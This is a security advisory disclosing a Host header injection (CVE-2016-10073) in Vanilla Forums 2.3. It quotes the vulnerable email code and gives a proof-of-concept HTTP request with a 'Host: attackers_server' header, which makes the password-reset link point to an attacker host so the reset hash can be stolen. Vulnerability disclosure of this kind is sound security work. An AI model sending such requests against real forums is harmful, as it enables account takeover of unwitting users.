============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10073 - Release date: 11.05.2017 - Revision 1.0 - Severity: Medium ============================================= I. VULNERABILITY ------------------------- Vanilla Forums <= 2.3 Host Header Injection CVE-2016-10073 [0day] II. BACKGROUND ------------------------- "Community Forums Reinvented Create an online community that your customers will love. Vanilla's forum software is used by top brands to engage customers, drive loyalty and reduce support costs." "Vanilla provides cloud and open source community forum software that powers discussion forums worldwide with close to 1M downloads. Built for flexibility and integration, Vanilla is the best, most powerful community solution in the world." https://vanillaforums.com/en/software/ https://open.vanillaforums.com/ III. INTRODUCTION ------------------------- Vanilla Forums software (including the latest stable version of 2.3 in its default configuration) is affected by: * Host Header Injection CVE-2016-10073 (0day) which can be exploited by unauthenticated remote attackers to potentially intercept password reset hash and gain unauthorized access to the victim account or perform web-cache poisoning attacks. IV. DESCRIPTION ------------------------- Vanilla Forums software, in its default configuration, makes use of user-supplied HTTP HOST header (CVE-2016-10073) when sending emails from the host on which the forum was installed. The HOST header is used to form the sender email address as we can see in the following snippet of code: ------[ library/core/class.email.php ]------ ... public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) { if ($SenderEmail == '') { $SenderEmail = c('Garden.Email.SupportAddress', ''); if (!$SenderEmail) { $SenderEmail = 'noreply@'.Gdn::request()->host(); } } if ($SenderName == '') { $SenderName = c('Garden.Email.SupportName', c('Garden.Title', '')); } if ($this->PhpMailer->Sender == '' || $bOverrideSender) { $this->PhpMailer->Sender = $SenderEmail; } ob_start(); $this->PhpMailer->setFrom($SenderEmail, $SenderName, false); ob_end_clean(); return $this; } ... ----------------------------------------- As we can see by default, Vanilla will use the 'noreply@HOST' address where HOST is obtained from the client HTTP request. V. PROOF OF CONCEPT ------------------------- An attacker may use HTTP HOST header to set the email domain to an arbitrary host. For example. Sending the following HTTP request: ------------ POST /vanilla2-3/entry/passwordrequest HTTP/1.1 Host: attackers_server Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close Content-Length: 149 hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=victim&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON ------------ will result in the following email sent to the victim: ------------ To: victim@victim-server.com Subject: [Vanilla 2.3] Reset Your Password X-PHP-Originating-Script: 0:class.phpmailer.php Date: Thu, 11 May 2017 09:42:13 +0000 Return-Path: noreply@attackers_server Message-ID: <a989e3868a609316dd9a7d7a991d79e5@attackers_server> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net) MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" Vanilla 2.3 http://attackers_server/vanilla2-3/=0A=0A=0A=0AReset Your Passw= ord=0A=0A=0A=0AWe've received a request to change your password at Vanilla = 2.3. If you didn't make this request, please ignore this email.=0A=0A=0A=0A= Change My Password: http://attackers_server/vanilla2-3/entry/passwordreset/= 2/PdNvqaPnnFaG ------------ Because of the HOST header set to: Host: attackers_server The resulting email will have the sender's address set to noreply@attackers_server. The password reset link will also contain the attacker's server which could allow the attacker to intercept the hash if the victim user clicked on the malicious link. VI. BUSINESS IMPACT ------------------------- With victim user interaction, attacker could potentially intercept the password reset hash. This vulnerability may also lead to web-cache poisoning if the HOST header is used to form links in web responses. See references for more details on this vector. VII. SYSTEMS AFFECTED ------------------------- The latest stable release of Vanilla Forums available at the official website: https://open.vanillaforums.com/addon/vanilla-core-2.3 was confirmed to be vulnerable. Previous versions are also likely to be vulnerable. This vulnerability can also be combined with CVE-2016-10033 vulnerability to achieve Unauthenticated Remote Code Execution as described in a separate advisory. VIII. SOLUTION ------------------------- This vulnerability was reported to Vanilla Forums support team in December 2016. Despite the acknowledgment of the issue by the team, it has remained unpatched for over 5 months. As there has been no progress or further updates, this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io https://twitter.com/Exploit_Box Vendor site: https://vanillaforums.com Confirmed vulnerable stable version of Vanilla Forums 2.3: https://open.vanillaforums.com/addon/vanilla-core-2.3 https://open.vanillaforums.com/discussion/32822/vanilla-2-3-is-now-available Vanilla Forums RCE 0day exploit: https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html Web-cache poisoning: http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io XI. REVISION HISTORY ------------------------- 11.05.2017 - Advisory released, rev. 1 XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.